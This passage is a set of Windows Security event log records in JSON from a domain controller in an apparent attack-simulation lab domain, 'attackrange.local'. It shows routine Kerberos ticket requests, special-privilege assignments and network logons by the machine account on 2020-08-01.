{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220300,"ProcessID":864,"ThreadID":2400,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-6178966$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{00831AAD-7772-5B99-90B2-A3A58B721FE0}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-6178966$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{00831AAD-7772-5B99-90B2-A3A58B721FE0}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220301,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4493B\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4493b","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220302,"ProcessID":864,"ThreadID":2632,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4493C\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4493c","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220303,"ProcessID":864,"ThreadID":2632,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4493C\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t49693\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4493c","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"49693","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220304,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4493B\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t49694\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4493b","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"49694","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220305,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":1104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-6178966$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{00831AAD-7772-5B99-90B2-A3A58B721FE0}\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x60810010\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-6178966$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x60810010","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{00831AAD-7772-5B99-90B2-A3A58B721FE0}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220306,"ProcessID":864,"ThreadID":2652,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x44BCA\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x44bca","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220307,"ProcessID":864,"ThreadID":2652,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tDelegation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x44BCA\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t49695\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x44bca","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"49695","ImpersonationLevel":"%%1840","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220308,"ProcessID":864,"ThreadID":1104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-6178966$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{00831AAD-7772-5B99-90B2-A3A58B721FE0}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40800000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-6178966$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40800000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{00831AAD-7772-5B99-90B2-A3A58B721FE0}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220309,"ProcessID":864,"ThreadID":3836,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x44C8A\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x44c8a","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220310,"ProcessID":864,"ThreadID":3836,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x44C8A\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t49698\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x44c8a","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"49698","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220311,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x44CF6\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special 